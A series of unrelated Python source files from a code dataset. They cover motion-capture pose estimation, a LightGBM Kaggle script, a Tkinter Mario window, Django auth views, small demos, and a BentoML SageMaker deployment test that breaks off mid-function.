'int64') for i, e in enumerate(self.columns)}\n        data_raw = data_raw.astype(dtypes)\n\n        # Frame id start at 0\n        data_raw[['frame_id']] = data_raw[['frame_id']] - 1\n\n        # Cutting non-usable data\n        filename = path.split('/')[-1]\n        to_cut = {'VolAvecPoubelle03.csv': 5000,\n                  'VolAvecPoubelle04.csv': 4000}\n        if filename in to_cut:\n            data_raw.drop(list(data_raw.index)[to_cut[filename]:], inplace=True)\n\n        # NaN drop of the drone's markers\n        point_column = []\n        for point_name in self.points_name:\n            point_column += [point_name + '_x', point_name + '_y', point_name + '_z']\n        # Get the rows of the drone's markers that contain at least one NaN\n        tmp = data_raw[point_column].loc[(data_raw[point_column].isna().sum(axis=1) > 0), :]\n        print(f'Found {len(tmp)} NaN in data at indexes : {[e for e in tmp.index]}.\\n'\n              f'(last index of data is : {len(data_raw) - 1}).\\n'\n              f'Proceeding by dropping them.')\n        data_raw = data_raw.drop(index=tmp.index)\n\n        # From mm to m\n        for e in self.columns[2:]:\n            data_raw[[e]] = data_raw[[e]] * 1e-3\n\n        self.data = MCData(data=data_raw)\n        self.drone_tf_o = np.zeros((4, 4)) # Will be defined in self.object_reference_frame\n\n    def get_pose(self) -> List[util.Transformation]:\n        \"\"\"\n        Returns the poses computed from the marker positions, each expressed as a\n        util.Transformation object such that pose = drone_tf_origin.\n        \"\"\"\n\n        poses = []\n\n        # Compute Transformation between drone and motion capture reference frame for all data\n        # Inspired by:\n        # http://nghiaho.com/?page_id=671&fbclid=IwAR3ss4avz2OyZmGeQRe9ZhDFF5slMKDQa3LLaSGZttcggvzkCqBBjM7MKvA\n\n        # Initialisation\n        ai_mat = np.zeros((len(self.points_name), 3))\n\n        # # Get ai'\n        # 
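(the pose computation below follows the standard Kabsch/SVD rigid\n        # alignment: R = V @ U.T from the SVD of the covariance H, with a\n        # determinant check to rule out reflections)\n        # 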
ai_prime_mat = np.zeros((len(self.points_name), 3))\n        # ai_prime = self.object_reference_frame(frame_number=0)\n        # for i, point_name in enumerate(self.points_name):\n        #     ai_prime_mat[i, :] = ai_prime[point_name]\n        # # Get ai' centroid\n        # centroid_ai_prime = np.mean(ai_prime_mat, axis=0)\n\n        # Get new ai' robust to noise\n        print(' Compute ai prime')\n        p = util.Progress(len(self.data))\n        ai_prime_framed = np.zeros((len(self.data), len(self.points_name), 3))\n        for frame_number in self.data.df.index:\n            ai_prime_framed[frame_number, :, :] = np.array(list(self.object_reference_frame(frame_number).values()))\n            p.update_pgr()\n        ai_prime_mat = np.mean(ai_prime_framed, axis=0)\n        centroid_ai_prime = np.mean(ai_prime_mat, axis=0)\n\n        # # TITLE : ai_prime_new analysis\n        # test = ai_prime_framed.reshape((len(self.data), len(self.points_name)*3))\n        # fig, ax = plt.subplots(1, 1)\n        # im = ax.imshow(np.corrcoef(test.T), cmap='plasma')\n        # ax.set_title('Normalized COV(point)')\n        # for funcs in [(ax.set_xticklabels, ax.set_xticks), (ax.set_yticklabels, ax.set_yticks)]:\n        #     funcs[0]([e for tmp in self.points_name for e in [tmp+'_x', tmp+'_y', tmp+'_z']], rotation=45)\n        #     funcs[1](range(len(self.points_name*3)))\n        # fig.colorbar(im, ax=ax)\n        # plt.show()\n\n        # # Tab\n        # mean = np.mean(test, axis=0)\n        # std_dev = np.diag(np.cov(test.T))\n        # res = (mean - std_dev) / mean\n        # table = prettytable.PrettyTable(['Point Coordinate', '(Mean - std_dev) / Mean'])\n        # for i, point_name in enumerate([e for tmp in self.points_name for e in [tmp+'_x', tmp+'_y', tmp+'_z']]):\n        #     table.add_row([point_name, res[i]])\n        # print(table)\n        print(' Compute poses')\n        p = util.Progress(len(self.data))\n        # Compute centroid for ai and then compute rotation matrix R and translation array T\n        for index in self.data.df.index:\n            # Get ai and their centroid\n            for i, point_name in enumerate(self.points_name):\n                ai_mat[i, :] = self.data.get_point(point_name, index)\n            centroid_ai = np.mean(ai_mat, axis=0)\n\n            # Compute rotation matrix\n            h = (ai_mat - centroid_ai).T @ (ai_prime_mat - centroid_ai_prime)\n            u, s, v = np.linalg.svd(h)\n            drone_r_origin = v.T @ u.T\n            if np.linalg.det(drone_r_origin) < 0:\n                u, s, v = np.linalg.svd(drone_r_origin)\n                v[2, :] = -1 * v[2, :]\n                drone_r_origin = v.T @ u.T\n\n            # Compute translation array\n            drone_t_origin = centroid_ai_prime - drone_r_origin @ centroid_ai\n\n            # Verification: the result of the following computation must be the zero matrix\n            # ai_prime_mat - ((drone_r_origin @ ai_mat.T).T + drone_t_origin)\n\n            # Append drone_tf_origin\n            drone_tf_origin = util.Transformation().from_rot_matrix_trans_vect(trans=drone_t_origin, rot=drone_r_origin)\n            poses.append(drone_tf_origin)\n\n            p.update_pgr()\n        return poses\n\n    def object_reference_frame(self, frame_number: int) -> Dict[str, np.ndarray]:\n        \"\"\"\n        Define the reference frame of the drone, C.\n\n        :param frame_number: The number of the frame to define C.\n        :return: All the measured points expressed in C.\n        \"\"\"\n        # Definition of C, the reference frame of the drone.\n        # First, its origin C is obtained by computing OC. 
With this definition it is almost the center of mass.\n        oc = np.zeros(3)\n        for i in range(4):\n            oc += self.data.get_point(f'b{i + 1}', frame_number)\n        oc = oc / 4\n\n        # bi's plane equation\n        bis_eq = util.plane_equation(self.data.get_point('b1', frame_number),\n                                     self.data.get_point('b3', frame_number),\n                                     self.data.get_point('b2', frame_number))\n        plane_normal = bis_eq[0:3]\n        # plane_normal must be oriented from bottom to top of the drone\n        if (self.data.get_point('y1', frame_number) - oc) @ plane_normal < 0:\n            bis_eq = - bis_eq\n            plane_normal = bis_eq[0:3]\n\n        # x axis definition\n        b1 = self.data.get_point('b1', frame_number)\n        y2 = self.data.get_point('y2', frame_number)\n        y2proj = (y2 - b1) - ((y2 - b1) @ plane_normal) * plane_normal + b1\n        x = (y2proj - oc) / np.linalg.norm(y2proj - oc)\n\n        # z axis definition\n        z = plane_normal / np.linalg.norm(plane_normal)\n\n        # y axis definition in O\n        y = np.cross(z, x) / np.linalg.norm(np.cross(z, x))\n\n        # Compute ai'\n        self.drone_tf_o = util.Transformation().from_trans_3_axis(trans=oc, x=x, y=y, z=z).inv()\n        res = {}\n        for point_name in self.points_name:\n            res[point_name] = self.drone_tf_o @ self.data.get_point(point_name, frame_number)\n\n        # # TITLE : Plotting ai and ai'\n        # fig = plt.figure()\n        # ax = fig.add_subplot(111, projection='3d')\n        # for i, point_name in enumerate(self.points_name):\n        #     # R0\n        #     point = self.data.get_point(point_name, frame_number)\n        #     ax.scatter(xs=point[0], ys=point[1], zs=point[2], c='tab:blue')\n        #     ax.text(x=point[0], y=point[1], z=point[2], s=point_name)\n        #     # Drone\n        #     point = res[point_name]\n        #     ax.scatter(xs=point[0], ys=point[1], zs=point[2], c='tab:orange')\n        #     ax.text(x=point[0], y=point[1], z=point[2], s=point_name)\n        #     if i == 0:\n        #         ax.scatter(xs=point[0], ys=point[1], zs=point[2], c='tab:blue', label='R0')\n        #         ax.scatter(xs=point[0], ys=point[1], zs=point[2], c='tab:orange', label='Drone')\n        #\n        # # y2 projected\n        # point = y2proj\n        # point_name = 'y2proj'\n        # ax.scatter(xs=point[0], ys=point[1], zs=point[2], c='tab:green')\n        # ax.text(x=point[0], y=point[1], z=point[2], s=point_name)\n        #\n        # # C\n        # point = oc\n        # point_name = 'C'\n        # ax.scatter(xs=point[0], ys=point[1], zs=point[2], c='tab:green')\n        # ax.text(x=point[0], y=point[1], z=point[2], s=point_name)\n        #\n        # # Plane normal\n        # ax.quiver(oc[0], oc[1], oc[2], plane_normal[0], plane_normal[1], plane_normal[2], length=0.1)\n        # xx, yy = np.meshgrid(np.linspace(-0.15, 0.1, 100), np.linspace(0.3, 0.6, 100))\n        # d = bis_eq[3]\n        # z = (-plane_normal[0] * xx - plane_normal[1] * yy - d) / plane_normal[2]\n        # ax.plot_surface(xx, yy, z, alpha=0.2)\n        #\n        # ax.view_init(azim=0, elev=90)\n        # ax.legend()\n        # plt.show()\n\n        return res\n\n    def get_data(self) -> 'MCData':\n        \"\"\"\n        :return: The cleaned imported data.\n        \"\"\"\n        return self.data\n\n\nclass MCData(object):\n    def __init__(self, data: pd.DataFrame):\n        self.columns = ['frame_id', 'sub_frame',\n                        'b1_x', 'b1_y', 'b1_z',\n                        'b2_x', 'b2_y', 'b2_z',\n                        'b3_x', 'b3_y', 'b3_z',\n                        'b4_x', 'b4_y', 'b4_z',\n                        'y1_x', 'y1_y', 'y1_z',\n                        'y2_x', 'y2_y', 'y2_z',\n                        'x2_x', 'x2_y', 'x2_z',\n                        'clapet_inf1_x', 'clapet_inf1_y', 'clapet_inf1_z',\n                        'clapet_inf2_x', 'clapet_inf2_y', 'clapet_inf2_z',\n                        'clapet_sup_2_x', 'clapet_sup_2_y', 'clapet_sup_2_z']\n        self.df = data\n\n    def __len__(self):\n        return len(self.df)\n\n    def get_val(self, columns: List[str], index: Union[np.ndarray, Iterable, int, float]) -> np.ndarray:\n        \"\"\"\n        Get the values of df given column 
names and indexes.\n        :param columns: The columns in which the values are. Possible columns are:\n\n            ['frame_id', 'sub_frame',\n            'b1_x', 'b1_y', 'b1_z',\n            'b2_x', 'b2_y', 'b2_z',\n            'b3_x', 'b3_y', 'b3_z',\n            'b4_x', 'b4_y', 'b4_z',\n            'y1_x', 'y1_y', 'y1_z',\n            'y2_x', 'y2_y', 'y2_z',\n            'x2_x', 'x2_y', 'x2_z',\n            'clapet_inf1_x', 'clapet_inf1_y', 'clapet_inf1_z',\n            'clapet_inf2_x', 'clapet_inf2_y', 'clapet_inf2_z',\n            'clapet_sup_2_x', 'clapet_sup_2_y', 'clapet_sup_2_z']\n\n        :param index: The indexes in which the values are.\n        :return: The values in a numpy array.\n        \"\"\"\n        return self.df[columns].iloc[index].to_numpy()\n\n    def get_point(self, point_name: str, index: Union[np.ndarray, Iterable, int, float]) -> np.ndarray:\n        \"\"\"\n        Get the 3 coordinates of the point in self.df given the point name and its index in the pd.DataFrame\n        :param point_name: The name of the point. Possible point names are:\n\n            ['b1', 'b2', 'b3', 'b4', 'y1', 'y2', 'x2', 'clapet_inf1', 'clapet_inf2', 'clapet_sup_2']\n\n        :param index: The index in df.\n        :return: The coordinates of the point as a numpy array of length 3.\n        \"\"\"\n        columns = [point_name + '_x', point_name + '_y', point_name + '_z']\n        for e in columns:\n            assert e in self.columns\n        return self.df[columns].iloc[index].to_numpy()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"mc_analysis.py","file_name":"mc_analysis.py","file_ext":"py","file_size_in_byte":13965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"324148312","text":"import math\nimport os\nimport sys\nimport time\n\nimport keras.backend as K\nimport lightgbm as gbm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport progressbar\nimport tensorflow as tf\nimport random\nfrom keras import regularizers\nfrom keras.callbacks.callbacks import (EarlyStopping, LearningRateScheduler,\n                                       ModelCheckpoint, ReduceLROnPlateau,\n                                       TerminateOnNaN)\nfrom keras.layers import (LSTM, Activation, BatchNormalization, Bidirectional,\n                          Concatenate, Conv1D, Dense, Dropout, Embedding,\n                          GlobalMaxPooling1D, Input, MaxPooling1D, Multiply)\nfrom keras.models import Model, Sequential, load_model\nfrom keras.optimizers import SGD, Adam\nfrom keras.preprocessing import sequence\nfrom keras.regularizers import l2\nfrom scipy import stats\nfrom sklearn import svm\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.feature_selection import (RFE, SelectKBest, SelectPercentile,\n                                       chi2, f_classif)\nfrom sklearn.metrics import (accuracy_score, precision_score, recall_score,\n                             roc_auc_score)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import class_weight, shuffle\nfrom xgboost import XGBRegressor, XGBClassifier\nfrom catboost import CatBoostClassifier\n\nsparse_index = [i for i in range(40)]\nsparse_index = [i for i in sparse_index if i not in [4, 10, 25]]\n\nprefix_path = 'data'\nlabels = pd.read_csv(prefix_path + '/train_kaggle.csv')\nprint('Labels', labels.describe())\niterations = 6\n\nparams = {\n    'boosting_type': 'gbdt',\n    'objective': 'binary',\n    'metric': {'l2', 'l1'},\n    'num_leaves': 256,\n    'min_data_in_leaf': 106,\n    'learning_rate': 0.02,\n    'feature_fraction': 0.8,\n    'bagging_fraction': 0.9,\n    'num_threads': 4,\n    'bagging_freq': 10,\n    'verbose': 0,\n    \"tree_learner\": \"feature\"\n}\n\n\ndef __preprocess_feature(feat):\n    sparse_x = feat[:, sparse_index]\n    return sparse_x\n\n\ndef __get_model(lgb_train, lgb_eval, x_train, y_train):\n    model = gbm.train(params,\n                      lgb_train,\n                      
num_boost_round=400,\n valid_sets=lgb_eval,\n early_stopping_rounds=30)\n return model\n '''\n clf = AdaBoostRegressor(n_estimators=500)\n clf.fit(X, y)\n return clf'''\n\n\ndef __extract_features(features, rand_indices):\n sparse_x = __preprocess_feature(np.array(features))\n\n # For each feature, we find average of all values and replace all NaN with that value\n sparse_means = np.nanmean(\n np.where(sparse_x != 0, sparse_x, np.nan), axis=0)\n sparse_max = np.nanmax(sparse_x, axis=0)\n\n sparse_medians = np.nanmedian(\n np.where(sparse_x != 0, sparse_x, np.nan), axis=0)\n sparse_nans = np.count_nonzero(np.isnan(sparse_x), axis=0)\n sparse_vars = np.nanvar(sparse_x, axis=0)\n sparse_modes = stats.mode(sparse_x)[0][0]\n\n # sp_features = np.concatenate([sparse_modes, sparse_vars, sparse_max, sparse_x[0], sparse_x[-1]])\n sp_features = np.concatenate([sparse_modes, sparse_vars, [sparse_x.shape[0]], sparse_x[0], sparse_x[-1]])\n return np.nan_to_num(sp_features, 0)\n\n\ntest_Y = []\n\nbatch_size = 256\ntrain_samples = 30336\ntest_samples = 10000\nno_epochs = 100\nmax_time = 50\n\nfor it in range(iterations):\n rand_indices = random.sample(range(1, 37), 25)\n test_X = []\n # Read test file\n test_X_features = []\n for fileno in range(10000):\n test_features = np.load(prefix_path + '/test/test/' + str(fileno) + '.npy')\n\n sp_features = __extract_features(test_features, rand_indices)\n\n test_X.append(sp_features)\n test_X_features.extend(test_features[:, 0])\n\n test_X = np.array(test_X)\n print('TEX shape', np.array(test_X_features).shape, np.unique(np.array(test_X_features)))\n\n print('Starting Iteration ', it)\n X = []\n y = []\n ones = len(labels.loc[labels['label'] == 1])\n\n shuffled_labels = shuffle(labels)\n shuffled_y = np.array(shuffled_labels['label'])\n\n for index, train_label in shuffled_labels.iterrows():\n label = train_label['label']\n if label == 0 and ones > 0:\n ones = ones - 0.8\n if ones <= 0 and label == 0:\n continue\n features = np.load(prefix_path + '/train/train/' +\n str(train_label['Id']) + '.npy')\n\n sp_features = __extract_features(features, rand_indices)\n X.append(sp_features)\n y.append(label)\n\n X = np.array(X)\n y = np.array(y)\n\n round_test_X = test_X # [:, top_features]\n\n x_train, x_val, y_train, y_val = train_test_split(X, y, test_size=0.20)\n\n lgb_train = gbm.Dataset(x_train, y_train)\n lgb_eval = gbm.Dataset(x_val, y_val, reference=lgb_train)\n\n gbm_model = __get_model(lgb_train, lgb_eval, x_train, y_train)\n\n xgb_model = XGBClassifier(learning_rate=0.1, scale_pos_weight=9, max_depth=7, min_child_weight=1, subsample=0.6,\n n_estimators=800, gamma=0.8, colsample_bytree=0.8)\n '''xgb_model = XGBClassifier(alpha=4, base_score=0.5, booster='gbtree', colsample_bylevel=1,\n colsample_bynode=1, colsample_bytree=0.9, gamma=0.1,\n learning_rate=0.05, max_delta_step=0, max_depth=9,\n min_child_weight=1, missing=-1, n_estimators=500, n_jobs=1,\n nthread=None, objective='binary:logistic', random_state=0,\n reg_alpha=0, reg_lambda=1, scale_pos_weight=1, seed=None,\n silent=None, subsample=0.9, tree_method='hist', verbosity=1)\n '''\n # xgb_model.fit(x_train, y_train, early_stopping_rounds=10, eval_metric=\"logloss\", eval_set=[(x_val, y_val)], verbose=True)\n\n cat_model = CatBoostClassifier()\n # cat_model.fit(x_train, y_train)\n\n # from sklearn.ensemble import BaggingClassifier\n\n # bag_model = BaggingClassifier()\n # bag_model.fit(x_train, y_train)\n\n y_pred = gbm_model.predict(x_val)\n print(y_pred.shape)\n\n xg_predictions = [int(round(value)) for 
value in y_pred]\n    print(\n        'Round validation ROC-AUC = {}, accuracy = {}, recall = {}, precision = {}'.format(roc_auc_score(y_val, y_pred),\n                                                                                           accuracy_score(y_val,\n                                                                                                          xg_predictions),\n                                                                                           recall_score(\n                                                                                               y_val, xg_predictions),\n                                                                                           precision_score(y_val,\n                                                                                                           xg_predictions)))\n\n    y_test_dl = gbm_model.predict(round_test_X)\n    test_Y.append(y_test_dl)\n\ntest_Y = np.array(test_Y)\nprint('Results', test_Y.shape)\n\nprint(test_Y)\ntest_Y = np.average(test_Y, axis=0)\nprint(test_Y.shape, test_Y)\n\ndf = pd.DataFrame()\ndf[\"Predicted\"] = test_Y\ndf.to_csv('outputs/ml-output.csv', index_label=\"Id\")\n","sub_path":"src/ml_feat.py","file_name":"ml_feat.py","file_ext":"py","file_size_in_byte":7231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"249239872","text":"from imgurpython import ImgurClient\nimport BotIDs\nimport re\n\nalbum = \"http://imgur.com/a/5oSFy\"\nalbumID = re.findall(r\"imgur.com/a/(\\w+)\", album)[0]\n\nclient = ImgurClient(BotIDs.imgur_clientID, BotIDs.imgur_Secret)\n\nalbumObj = client.get_album(albumID)\nalbumPics = client.get_album_images(albumID)\n\nquotes = {}\n\nfor pic in albumPics:\n    quotes[pic.description] = pic.link","sub_path":"cogs/glen.py","file_name":"glen.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"292357593","text":"''' 4.10.12\r\nauthor-manas verma\r\nsnake, water, gun game\r\nNow moving on to instructions.[ ignore, this is for me:| ]\r\n\r\nYou have to use a random choice function that we studied in tutorial #38, to\r\nselect between, snake, water, and gun.\r\n\r\nYou do not have to use a print statement in case of the above function.\r\n\r\nThen you have to give input from your side.\r\n\r\nAfter getting ten consecutive inputs, the computer will show the result based on each iteration.\r\nYou have to use loops(while loop is preferred).'''\r\n\r\nimport random\r\n\r\nprint('XXXXXXXXXXXXXSnake, Water, Gun gameXXXXXXXXXXXXXXXXXXXXX')\r\n\r\n\r\ndef wingame(you, comp):\r\n    if comp == you:\r\n        return None\r\n    elif comp == 's':\r\n        if you == 'w':\r\n            return False # snake drinks water, the computer wins\r\n        elif you == 'g':\r\n            return True # gun kills snake, you win\r\n    elif comp == 'w':\r\n        if you == 'g':\r\n            return False\r\n        elif you == 's':\r\n            return True\r\n    elif comp == 'g':\r\n        if you == 's':\r\n            return False\r\n        elif you == 'w':\r\n            return True\r\ni = 0\r\nscore = 0\r\nwhile (i == 0):\r\n\r\n    ra = random.randint(1, 3)\r\n    if ra == 1:\r\n        comp = 's'\r\n    elif ra == 2:\r\n        comp = 'w'\r\n    elif ra == 3:\r\n        comp = 'g'\r\n\r\n    print('Computer Turn: Snake(s) Water(w) Gun(g)?')\r\n    you = input('Your Turn: Snake(s) Water(w) Gun(g)?')\r\n    print(f'Computer Chose {comp}')\r\n    print(f'You Chose {you}')\r\n\r\n    if wingame(you, comp) == None:\r\n        print('Tie')\r\n\r\n    elif wingame(you, comp):\r\n        print('You Win!!')\r\n        score = 5 + score\r\n        print(score)\r\n\r\n    else:\r\n        print(\"You Lose!!\\ngame over\")\r\n    i = int(input('Continue(0) Exit(1)?'))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"snake, water, gun game.py","file_name":"snake, water, gun game.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"588743401","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# stability region\n\n# set up \"complex plane\"\nx = np.linspace(-4,4,100)\ny = np.linspace(-4,4,100)\n\n[X, Y] = np.meshgrid(x, y)\nZ = X + 1j*Y\n\n# 
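for classical RK4 the stability function is\n# R(z) = 1 + z + z^2/2 + z^3/6 + z^4/24, so the region plotted below is |R(z)| <= 1;\n# 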
calculate region: \nU = abs(1 + Z + 0.5*Z**2 + (1./6)*Z**3 + (1./24)*Z**4)\n\n# and plot\nplt.contour(X, Y, U, [1]) # contour for U = 1\nplt.contourf(X, Y, U, [0, 1]) # colour area in interval [0,1]\n\nplt.xlabel(\"$\\lambda_{Re} \\Delta t$\")\nplt.ylabel(\"$\\lambda_{Im} \\Delta t$\")\n\nplt.show()\n\n# calculate amplification error + phase error\na = lambda z: (1 + 0.5*z**2 + (1./24)*z**4)**2 + (z - (1./6)*z**3)**2\ntheta = lambda z: np.arctan((z - (1./6)*z**3)/(1 + 0.5*z**2 + (1./24)*z**4)) - z\n\nz = np.linspace(-3,3,100) # stable around approx +-2.8\n\nplt.plot(z, a(z), z, theta(z))\nplt.xlabel(\"$\\lambda_{Im} \\Delta t$\")\nplt.ylabel(\"Error\")\nplt.show()\n","sub_path":"stab_RK.py","file_name":"stab_RK.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"646737646","text":"# coding=utf-8\r\n# Version:python3.7.3\r\n# Tools:Pycharm\r\n__date__ = '2019/4/11 10:50'\r\n__author__ = 'Lee7'\r\nimport gevent\r\nimport time\r\n\r\n\r\ndef f1(n):\r\n\r\n    for i in range(n):\r\n        print(gevent.getcurrent(), i)\r\n        # time.sleep(1)\r\n        gevent.sleep(0.01)\r\n\r\n\r\ndef f2(n):\r\n\r\n    for i in range(n):\r\n        print(gevent.getcurrent(), i)\r\n        # time.sleep(1)\r\n        gevent.sleep(0.01)\r\n\r\n\r\ndef f3(n):\r\n\r\n    for i in range(n):\r\n        print(gevent.getcurrent(), i)\r\n        # time.sleep(1)\r\n        gevent.sleep(0.01)\r\n\r\n\r\ng1 = gevent.spawn(f1, 100)\r\ng2 = gevent.spawn(f2, 100)\r\ng3 = gevent.spawn(f3, 1000)\r\n\r\ng1.join()\r\n# time.sleep(100) # would not interrupt the spawned greenlets\r\ng2.join()\r\ng3.join()\r\n","sub_path":"多任务/lee7_gevent实现多任务.py","file_name":"lee7_gevent实现多任务.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166072332","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom models import *\nfrom django.contrib import messages\n\n# def test(request):\n#     print \"/\\/\\/\\/\\/\\/ Create your views here.\"\n\ndef index(request):\n    return render(request, \"users_app/index.html\") \n\ndef register(request):\n    results = User.objects.register_validator(request.POST)\n    if results['status']==False:\n        for error in results['errors']:\n            messages.error(request, error)\n        return redirect('/index')\n    user = User.objects.createUser(request.POST)\n    messages.success(request, 'You registered successfully! 
Please log in.')\n    return redirect('/')\n\ndef login(request):\n    results = User.objects.login_validator(request.POST)\n    if results['status']==False:\n        for error in results['errors']:\n            messages.error(request, error)\n        return redirect('/index')\n    # store a user auth token in sessions to allow a session check\n    request.session['user_id']=results['user'].id\n    request.session['user_first_name']=results['user'].first_name\n\n    storage = messages.get_messages(request)\n    storage.used = True\n    return redirect('/success')\n\ndef sessionCheck(request):\n    try:\n        return request.session['user_id']\n    except:\n        return False\n\ndef success(request):\n    if sessionCheck(request)==False:\n        return redirect ('/')\n    messages.success(request, 'Successfully logged in!')\n    # return render(request, 'users_app/success.html')\n    return HttpResponse('This will link to HOME page.')\n\ndef logout(request):\n    request.session.flush()\n    return redirect ('/')\n","sub_path":"python_stack/beltReview_project/apps/users_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590982775","text":"# -*- coding: utf-8 -*-\n\nimport Tkinter\nfrom Tkinter import *\n\nimport Image, ImageTk, tkFont\n\nfrom Data_window import Data_window\n\n############################################################################################################################\n#\n#\tDefinition of global variables.\n#\n############################################################################################################################\n\n# Main window data\nGAME_WIDTH = 1000\nGAME_HEIGHT = 500 \n\n############################################################################################################################\n#\n#\t\tWindow class:\n#\t\tinstantiation of the display, main loop, Tkinter widgets\n#\n############################################################################################################################\n\nclass Window(Tkinter.Tk):\n\n    def __init__(self,parent):\n        Tkinter.Tk.__init__(self,None)\n        self.initialize()\n\n############################################################################################################################\n#\tInitializes the data:\n############################################################################################################################\n\n    def initialize(self):\n        \n        ## Window display parameters ##\n        self.title('Mario')\n        self.grid # grid layout type, cf. Tkinter\n        self.geometry(\"1000x550\") # Window size\n        self.entry = Tkinter.Entry(self)\n        self.grid_columnconfigure(0,weight=1)\n        self.resizable(False,False) # resizable window\n\n        self.data_window = Data_window(self)\n        \n        ## Graphical components of the window ##\n\n        panneau=Tkinter.PanedWindow(orient=Tkinter.VERTICAL) # Main panel\n        panneau.pack(expand=\"yes\", fill=\"both\")\n\n        # Menu #\n        menu = Tkinter.PanedWindow(height=25,orient=Tkinter.HORIZONTAL) # menu row containing the interaction buttons\n        panneau.add(menu)\n\n        # Logo #\n        mario_img=Image.open(\"./mario_b.gif\") # load the image\n        mario_img = mario_img.resize((75,48))\n        mario_img = ImageTk.PhotoImage(mario_img)\n        label = Tkinter.Label(image=mario_img) # create the label\n        label.photo = mario_img # configure the label in image mode\n        menu.add(label)\n        \n        # Buttons #\n        test = Tkinter.Button(menu,text=\"Boutton test\", command=self.test) # Another 
button\n        menu.add(test)\n\n        # Level selection button\n        level_button_text = \"level 0\"\n        self.level = Tkinter.Button(menu,text=level_button_text, command=self.set_level) # Level selection button\n        menu.add(self.level)\n\n        # Level restart button\n        restart = Tkinter.Button(menu,text=\"Restart\", command=self.restart) # Restart button\n        menu.add(restart)\n        \n        \n        ## Game area ##\n\n        self.game_window = Tkinter.Canvas(self, background='darkgray',width=GAME_WIDTH, height = GAME_HEIGHT) # Create a graphics area: Canvas\n        self.game_window.pack(side=Tkinter.BOTTOM) # Positioned at the bottom\n\n        ## Keyboard bindings ##\n\n        # Manual controls\n        self.bind_all('d', self.forward) # Move forward 'd'\n        self.bind_all('q', self.back) # Move backward 'q'\n        self.bind_all(\"<space>\", self.jump) # Jump: Space\n        \n        self.bind_all('t', self.test)\n\n\n############################################################################################################################\n#\tMovement command methods\n############################################################################################################################\n\n    def forward(self,*args):\n        self.control.ordered(\"forward\")\n\n    def back(self,*args):\n        self.control.ordered(\"back\")\n\n    def jump(self,*args):\n        self.control.ordered(\"jump\")\n\n    # Move in the direction the character is facing #\n    def walk(self,*args):\n        self.control.ordered(\"walk\")\n\n############################################################################################################################\n#\tGeneric methods\n############################################################################################################################\n\n    def get_window(self):\n        return self.game_window\n\n    def set_control(self,control):\n        self.control = control\n        self.data_window.set_control(self.control)\n\n    def restart(self,*args):\n        self.control.restart()\n\n    def test(self,*args):\n        self.control.test(args)\n\n    def set_level(self,*args):\n        if self.control.level < 7:\n            self.control.level = self.control.level + 1\n        else:\n            self.control.level = 0\n        self.level_button_text = \"level \"+str(self.control.level)\n        self.level.config(text = self.level_button_text)\n\n############################################################################################################################\n#\tGeneral methods\n############################################################################################################################\n    \n    def pop_text(self,text):\n        font = tkFont.Font(size = 50, weight = \"bold\")\n        return self.game_window.create_text(400,200, text=text,font=font)\n    \n    def update_data(self):\n        self.data_window.update_data()\n    \n    def update_assertz(self,interdiction):\n        self.data_window.update_assertz(interdiction)","sub_path":"2.0/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330907157","text":"#!/usr/bin/env python\n\nimport subprocess\nimport logging\nimport uuid\n\nfrom bentoml import BentoService, load, api\nfrom bentoml.handlers import DataframeHandler\n\nlogger = logging.getLogger('bentoml.test')\n\n\ndef run_sagemaker_create_or_update_command(deploy_command):\n    deployment_failed = False\n    endpoint_name = ''\n    logger.info(f\"Running bentoml deploy command: {' '.join(deploy_command)}\")\n    with subprocess.Popen(\n        deploy_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n    ) as proc:\n        deployment_stdout = 
proc.stdout.read().decode('utf-8')\n        logger.info('Finished deploying to AWS Sagemaker')\n        logger.info(deployment_stdout)\n\n    if deployment_stdout.startswith(\n        'Failed to create AWS Sagemaker deployment'\n    ) or deployment_stdout.startswith('Failed to update AWS Sagemaker deployment'):\n        deployment_failed = True\n        return deployment_failed, endpoint_name\n    deployment_stdout_list = deployment_stdout.split('\\n')\n    for index, message in enumerate(deployment_stdout_list):\n        if '\"EndpointName\":' in message:\n            endpoint_name = message.split(':')[1].strip(',').replace('\"', '')\n\n    return deployment_failed, endpoint_name\n\n\ndef test_deployment_result(endpoint_name, expect_result, sample_data=None):\n    logger.info(f'Test deployment with sample request for {endpoint_name}')\n    deployment_failed = False\n    sample_data = sample_data or '\"[0]\"'\n    try:\n        test_command = [\n            'aws',\n            'sagemaker-runtime',\n            'invoke-endpoint',\n            '--endpoint-name',\n            endpoint_name,\n            '--content-type',\n            '\"application/json\"',\n            '--body',\n            sample_data,\n            '>(cat) 1>/dev/null',\n            '|',\n            'jq .',\n        ]\n        logger.info('Testing command: %s', ' '.join(test_command))\n        result = subprocess.run(\n            ' '.join(test_command),\n            capture_output=True,\n            shell=True,\n            executable='/bin/bash',\n        )\n        logger.info(result)\n        if result.stderr.decode('utf-8'):\n            logger.error(result.stderr.decode('utf-8'))\n            deployment_failed = True\n        else:\n            logger.info('Prediction Result: %s', 